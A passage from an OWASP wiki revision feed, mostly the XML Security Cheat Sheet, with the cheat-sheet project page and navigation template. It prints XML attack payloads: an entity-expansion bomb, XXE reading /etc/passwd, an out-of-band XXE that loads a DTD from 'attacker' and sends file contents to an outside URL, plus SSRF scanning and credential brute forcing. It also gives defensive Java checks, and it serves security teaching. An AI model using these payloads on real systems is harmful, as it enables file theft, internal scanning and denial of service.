  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;SOAP-ENV:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:SOAP-ENV=&amp;quot;&amp;lt;nowiki&amp;gt;http://schemas.xmlsoap.org/soap/envelope/&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP-ENV:Body&amp;gt;&lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;&amp;lt;nowiki&amp;gt;urn:parasoft:ws:store&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP-ENV:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP-ENV:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, for example a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External DNS Resolution ====&lt;br /&gt;
&lt;br /&gt;
Sometimes it is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but it requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.&lt;br /&gt;
 &amp;lt;!DOCTYPE m PUBLIC &amp;quot;-//B/A/EN&amp;quot; &amp;quot;http://'''checkforthisspecificdomain'''.example.com&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
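&lt;br /&gt;
On the defensive side, a resolver can refuse every external identifier before a connection is attempted. This is a minimal sketch using the standard &amp;lt;tt&amp;gt;DocumentBuilder.setEntityResolver&amp;lt;/tt&amp;gt; hook; &amp;lt;tt&amp;gt;NoExternalFetchParser&amp;lt;/tt&amp;gt; is a hypothetical name, and aborting the parse (rather than substituting empty content) is a design choice made here for illustration:&lt;br /&gt;

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

// Hypothetical helper: aborts parsing as soon as an external resource is requested.
final class NoExternalFetchParser {

    // Returns true when parsing was aborted, for example by the resolver below.
    static boolean isBlocked(String xml) {
        try {
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            // Refuse every external identifier before any connection is attempted.
            builder.setEntityResolver((publicId, systemId) -> {
                throw new SAXException("External resource blocked: " + systemId);
            });
            builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (Exception e) {
            return true;
        }
    }
}
```

Because the resolver throws instead of returning a stream, the parser never opens a connection on behalf of the document.&lt;br /&gt;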
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM '&amp;lt;nowiki&amp;gt;http://example.com/?%file;&amp;lt;/nowiki&amp;gt;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure, you can clearly see what is going on because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: &amp;lt;nowiki&amp;gt;http://192.168.1.1:80&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be much shorter (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish on higher-latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI (http, ftp, etc.). For example:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
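&lt;br /&gt;
Identifiers that embed credentials can be screened for before they are resolved. A small sketch, assuming the system identifier is available as a string; &amp;lt;tt&amp;gt;CredentialedUriCheck&amp;lt;/tt&amp;gt; is a hypothetical helper:&lt;br /&gt;

```java
import java.net.URI;

// Hypothetical helper: detects system identifiers that embed credentials.
final class CredentialedUriCheck {

    // True when the identifier carries a user-information part,
    // as in http://username:password@example.com:8080.
    static boolean hasUserInfo(String systemId) {
        return URI.create(systemId).getRawUserInfo() != null;
    }
}
```

The identifier used in the example above would be flagged, while the same host and port without the credentials would not.&lt;br /&gt;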
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Cheat_Sheet_Series&amp;diff=228674</id>
		<title>OWASP Cheat Sheet Series</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Cheat_Sheet_Series&amp;diff=228674"/>
				<updated>2017-04-14T14:55:06Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* News and Events */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Main = &lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific web application security topics. These cheat sheets were created by various application security professionals who have expertise in specific topics. We hope that the OWASP Cheat Sheet Series provides you with excellent security guidance in an easy to read format.&lt;br /&gt;
&lt;br /&gt;
If you have any questions about the OWASP Cheat Sheet Series, please email the project leader [mailto:jim.manico@owasp.org Jim Manico] or subscribe to our [https://lists.owasp.org/mailman/listinfo/owasp-cheat-sheets project email list].&lt;br /&gt;
&lt;br /&gt;
== Authors ==&lt;br /&gt;
&lt;br /&gt;
Project Leader: [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]&amp;lt;br/&amp;gt;&lt;br /&gt;
Contributors: Mishra Dhiraj, Shruti Kulkarni, Torsten Gigler, Michael Coates, Jeff Williams, Dave Wichers, Kevin Wall, Jeffrey Walton, Eric Sheridan, Kevin Kenan, David Rook, Fred Donovan, Abraham Kang, Dave Ferguson, Shreeraj Shah, Raul Siles, Colin Watson, Neil Matatall and &amp;lt;b&amp;gt;many more&amp;lt;/b&amp;gt;!&lt;br /&gt;
&lt;br /&gt;
== OWASP Cheat Sheets ==&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Access ==&lt;br /&gt;
OWASP Cheatsheet Series Book : April 2015 [https://www.owasp.org/images/9/9a/OWASP_Cheatsheets_Book.pdf PDF download].&lt;br /&gt;
&lt;br /&gt;
== Email List ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/owasp-cheat-sheets Project Email List]&lt;br /&gt;
&lt;br /&gt;
== Licensing ==&lt;br /&gt;
The OWASP &amp;lt;i&amp;gt;Cheat Sheet Series&amp;lt;/i&amp;gt; is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
* [[OWASP Proactive Controls]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project OWASP Application Security Verification Standard Project]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [Jan 17 2017] [https://www.owasp.org/index.php/XML_Security_Cheat_Sheet XML Security Cheat Sheet] added to project&lt;br /&gt;
* [Feb 6 2016] New navigation template rolled out project-wide&lt;br /&gt;
* [Jun 11 2015] [https://www.owasp.org/index.php/SAML_Security_Cheat_Sheet SAML Cheat Sheet] added to project&lt;br /&gt;
* [Feb 11 2015] [https://www.owasp.org/images/9/9a/OWASP_Cheatsheets_Book.pdf Cheat Sheet &amp;quot;book&amp;quot;] added to project &lt;br /&gt;
* [Apr 4 2014] All non-draft cheat sheets moved to new wiki template!&lt;br /&gt;
* [Feb 4 2014] Project-wide cleanup started&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-labs-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Labs_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Master Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
==Authentication==&lt;br /&gt;
Ensure all entities go through an appropriate and adequate form of authentication. All non-public resources of the application must be protected, and it must not be possible to bypass that protection.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Authentication_Cheat_Sheet Authentication Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Session Management==&lt;br /&gt;
&lt;br /&gt;
Use secure session management practices that ensure that authenticated users have a robust and cryptographically secure association with their session. &lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Session_Management_Cheat_Sheet Session Management Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Access Control==&lt;br /&gt;
&lt;br /&gt;
Ensure that a user has access only to the resources they are entitled to. Perform access control checks on the server side on every request. All user-controlled parameters should be validated with entitlement checks. Check if user name or role name is passed through the URL or through hidden variables. Prepare an ACL containing the Role-to-Function mapping and validate if the users are granted access as per the ACL.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Access_Control_Cheat_Sheet Access Control Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Input Validation==&lt;br /&gt;
&lt;br /&gt;
Input validation is performed to minimize malformed data from entering the system. Input Validation is NOT the primary method of preventing XSS, SQL Injection. These are covered in output encoding below.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet Input Validation Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Output Encoding==&lt;br /&gt;
&lt;br /&gt;
Output encoding is the primary method of preventing XSS and injection attacks. Input validation helps minimize the introduction of malformed data, but it is a secondary control.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/XSS_Prevention_Cheat_Sheet XSS (Cross Site Scripting) Prevention Cheat Sheet].&lt;br /&gt;
&lt;br /&gt;
==Cross Domain==&lt;br /&gt;
&lt;br /&gt;
Ensure that adequate controls are present to protect against Cross-Site Request Forgery, Clickjacking and other malicious third-party scripts.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet Cross Site Request Forgery]&lt;br /&gt;
&lt;br /&gt;
==Secure Transmission==&lt;br /&gt;
&lt;br /&gt;
Ensure that all of the application's pages are served over cryptographically secure HTTPS. Prohibit the transmission of session cookies over HTTP.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet Transport Protection Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Logging==&lt;br /&gt;
&lt;br /&gt;
Ensure that all the security related events are logged. Events include: User log-in (success/fail); view; update; create, delete, file upload/download, attempt to access through URL, URL tampering. Audit logs should be immutable and write only and must be protected from unauthorized access.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Logging_Cheat_Sheet Logging Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Uploads==&lt;br /&gt;
&lt;br /&gt;
Ensure that the size, type, contents and name of the uploaded files are validated. Uploaded files must not be accessible to users by direct browsing. Preferably store all the uploaded files in a different file server/drive on the server. All files must be virus scanned using a regularly updated scanner.&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
* Bring all cheat sheets out of draft by December 2016&lt;br /&gt;
* Go through the cheat sheets to make sure what they recommend is consistent with ASVS (TBD).&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|OWASP Cheat Sheets Project]]&lt;br /&gt;
[[Category:OWASP_Document]]&lt;br /&gt;
[[Category:OWASP_Alpha_Quality_Document]]&lt;br /&gt;
[[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Cheatsheet_Navigation_Body&amp;diff=228673</id>
		<title>Template:Cheatsheet Navigation Body</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Cheatsheet_Navigation_Body&amp;diff=228673"/>
				<updated>2017-04-14T14:52:46Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: sorted the cheat sheets by alphabetical order and moved the xml security cheat sheet to assessment/breaker&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;See documentation of [[Template:navigationBoxBegin|the navigationBoxBegin template]] to see how this works...&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
{{navigationBoxBegin|title=[[Cheat_Sheets|Cheat Sheets]]|editlink={{FULLPAGENAME}}}}&lt;br /&gt;
{{navigationBoxRow|title=Developer / Builder|content=&lt;br /&gt;
* [[3rd_Party_Javascript_Management_Cheat_Sheet|3rd Party Javascript Management]]&lt;br /&gt;
* [[Access Control Cheat Sheet|Access Control]]&lt;br /&gt;
* [[AJAX Security Cheat Sheet]]&lt;br /&gt;
* [[Authentication Cheat Sheet|Authentication]] ([[Authentication_Cheat_Sheet_Español|ES]])&lt;br /&gt;
* [[Bean Validation Cheat Sheet]]&lt;br /&gt;
* [[Choosing and Using Security Questions Cheat Sheet|Choosing and Using Security Questions]]&lt;br /&gt;
* [[Clickjacking Defense Cheat Sheet|Clickjacking Defense]]&lt;br /&gt;
* [[C-Based Toolchain Hardening Cheat Sheet|C-Based Toolchain Hardening]]&lt;br /&gt;
* [[Credential Stuffing Prevention Cheat Sheet]]&lt;br /&gt;
* [[Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet|Cross-Site Request Forgery (CSRF) Prevention]]&lt;br /&gt;
* [[Cryptographic Storage Cheat Sheet|Cryptographic Storage]]&lt;br /&gt;
* [[Deserialization_Cheat_Sheet|Deserialization]]&lt;br /&gt;
* [[DOM based XSS Prevention Cheat Sheet|DOM based XSS Prevention]]&lt;br /&gt;
* [[Forgot Password Cheat Sheet|Forgot Password]]&lt;br /&gt;
* [[HTML5 Security Cheat Sheet|HTML5 Security]]&lt;br /&gt;
* [[HTTP Strict Transport Security Cheat Sheet|HTTP Strict Transport Security]]&lt;br /&gt;
* [[Injection Prevention Cheat Sheet]]&lt;br /&gt;
* [[Injection Prevention Cheat Sheet in Java]]&lt;br /&gt;
* [[JSON Web Token (JWT) Cheat Sheet for Java]]&lt;br /&gt;
* [[Input Validation Cheat Sheet|Input Validation]]&lt;br /&gt;
* [[JAAS Cheat Sheet|JAAS]]&lt;br /&gt;
* [[LDAP Injection Prevention Cheat Sheet|LDAP Injection Prevention]]&lt;br /&gt;
* [[Logging Cheat Sheet|Logging]]&lt;br /&gt;
* [[Mass Assignment Cheat Sheet]]&lt;br /&gt;
* [[.NET Security Cheat Sheet|.NET Security]]&lt;br /&gt;
* [[OWASP Top Ten Cheat Sheet|OWASP Top Ten]]&lt;br /&gt;
* [[Password Storage Cheat Sheet|Password Storage]]&lt;br /&gt;
* [[Pinning Cheat Sheet|Pinning]]&lt;br /&gt;
* [[Query Parameterization Cheat Sheet|Query Parameterization]]&lt;br /&gt;
* [[Ruby on Rails Cheatsheet|Ruby on Rails]]&lt;br /&gt;
* [[REST Security Cheat Sheet|REST Security]]&lt;br /&gt;
* [[Session Management Cheat Sheet|Session Management]]&lt;br /&gt;
* [[SAML Security Cheat Sheet|SAML Security]]&lt;br /&gt;
* [[SQL Injection Prevention Cheat Sheet|SQL Injection Prevention]]&lt;br /&gt;
* [[Transaction Authorization Cheat Sheet|Transaction Authorization]]&lt;br /&gt;
* [[Transport Layer Protection Cheat Sheet|Transport Layer Protection]]&lt;br /&gt;
* [[Unvalidated Redirects and Forwards Cheat Sheet|Unvalidated Redirects and Forwards]]&lt;br /&gt;
* [[User Privacy Protection Cheat Sheet|User Privacy Protection]]&lt;br /&gt;
* [[Web Service Security Cheat Sheet|Web Service Security]]&lt;br /&gt;
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet|XSS (Cross Site Scripting) Prevention]]&lt;br /&gt;
* [[XML External Entity (XXE) Prevention Cheat Sheet]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=Assessment / Breaker|content=&lt;br /&gt;
* [[Attack Surface Analysis Cheat Sheet|Attack Surface Analysis]]&lt;br /&gt;
* [[REST Assessment Cheat Sheet|REST Assessment]]&lt;br /&gt;
* [[Web Application Security Testing Cheat Sheet|Web Application Security Testing]]&lt;br /&gt;
* [[XML Security Cheat Sheet]]&lt;br /&gt;
* [[XSS Filter Evasion Cheat Sheet|XSS Filter Evasion]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=Mobile|content=&lt;br /&gt;
* [[Android_Testing_Cheat_Sheet|Android Testing]]&lt;br /&gt;
* [[IOS Developer Cheat Sheet|IOS Developer]]&lt;br /&gt;
* [[Mobile Jailbreaking Cheat Sheet|Mobile Jailbreaking]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=OpSec / Defender|content=&lt;br /&gt;
* [[Virtual Patching Cheat Sheet|Virtual Patching]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxRow|title=Draft and Beta|content=&lt;br /&gt;
* [[Application Security Architecture Cheat Sheet|Application Security Architecture]]&lt;br /&gt;
* [[Business Logic Security Cheat Sheet|Business Logic Security]]&lt;br /&gt;
* [[Command Injection Defense Cheat Sheet]]&lt;br /&gt;
* [[Content Security Policy Cheat Sheet|Content Security Policy]]&lt;br /&gt;
* [[Denial of Service Cheat Sheet]]&lt;br /&gt;
* [[Grails Secure Code Review Cheat Sheet|Grails Secure Code Review]]&lt;br /&gt;
* [[Insecure Direct Object Reference Prevention Cheat Sheet|Insecure Direct Object Reference Prevention]]&lt;br /&gt;
* [[IOS Application Security Testing Cheat Sheet|IOS Application Security Testing]]&lt;br /&gt;
* [[Key Management Cheat Sheet|Key Management]]&lt;br /&gt;
* [[PHP Security Cheat Sheet|PHP Security]]&lt;br /&gt;
* [[Regular Expression Security Cheatsheet]]&lt;br /&gt;
* [[Secure Coding Cheat Sheet|Secure Coding]]&lt;br /&gt;
* [[Secure SDLC Cheat Sheet|Secure SDLC]]&lt;br /&gt;
* [[Threat Modeling Cheat Sheet|Threat Modeling]]&lt;br /&gt;
}}&lt;br /&gt;
{{navigationBoxEnd|content=[[:Category:Cheatsheets|All Pages In This Category]]}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=225288</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=225288"/>
				<updated>2017-01-17T22:51:42Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* Authors and Primary Editors */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
